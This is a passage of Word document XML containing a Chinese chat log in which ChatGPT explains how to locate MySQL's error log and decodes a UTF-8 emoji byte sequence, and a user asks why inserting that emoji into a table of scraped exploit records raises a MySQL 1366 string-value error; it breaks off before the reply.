      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的报错日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348B5071" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99CED9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA145D5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的错误日志是用于诊断问题和跟踪活动的重要工具。下面是查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误日志的常见方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0800BE8B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9A9CE3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看配置文件：你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置文件中找到错误日志文件的位置。这个文件通常称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> my.cnf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> my.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其位置可能因操作系统和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的不同而不同。在这个文件中，你可以找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> log-error </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置项，它指定了错误日志文件的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09816166" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43822A9F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SHOW VARIABLES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句：你可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端执行以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句来查看错误日志文件的位置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9E1D0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5748D069" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70430F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    SHOW VARIABLES LIKE 'log_error';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C9540B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A9E950" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个语句会返回一个结果，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列就是错误日志文件的路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F686832" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5372209A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接查看日志文件：一旦你找到了错误日志文件的位置，你就可以使用任何文本编辑器或者命令行工具来查看它。例如，如果你在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> less </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令查看日志文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C599700" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7402B9C8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279E253E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    less /path/to/your/logfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79079177" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3264692F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5123F9BA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C30439D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129EBF38" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    tail -f /path/to/your/logfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A9172" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694AB4E7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL Workbench</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：如果你使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL Workbench</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以通过服务器状态和系统信息面板查看错误日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720AF0BC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C24EF0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，你可能需要有适当的权限才能查看错误日志文件，因为它可能包含敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415B23BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60768EE7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\\xF0\\x9F\\xA4\\x96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F55292E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4119ADD1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112DF82E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">\xF0\x9F\xA4\x96 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码形式。具体来说，它代表了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>字符：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是我们常见的机器人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96BA9A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50818122" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的码点是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U+1F916</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码中，这个码点被编码为四个字节：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F0 9F A4 96</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1343D15E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC3B8B9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，你可能需要一个支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字体和终端才能正确显示这个字符。如果你在一个不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的环境中尝试显示这个字符，你可能会看到一个代替字符，或者看不到任何东西。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92662E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166A571" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的建表语句如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建数据表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `cve_trends`.`sploitus`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E59266" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>create table `cve_trends`.`sploitus` (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E55A7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`id` INT AUTO_INCREMENT PRIMARY KEY NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798D896" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB9C224" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`title` varchar(400) COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞标题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A59BC23" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`score` varchar(20) COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载热度得分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F937B7C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`href` varchar(300) COMMENT 'exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F505B0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`type` varchar(300) COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据来源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7E8E8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`published` DATE COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF006C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`sploitus_id` varchar(100) UNIQUE COMMENT 'sploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1FF7B1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>`source` TEXT COMMENT 'exp',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E0D93" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`language` varchar(100) COMMENT 'exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540BBD28" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61649201" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`update_time` DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建、更改时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A420E79" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是依然报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1366, "Incorrect string value: '\\xF0\\x9F\\xA4\\x96 A...' for column 'source' at row 1") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮我分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03321732" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B08779" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
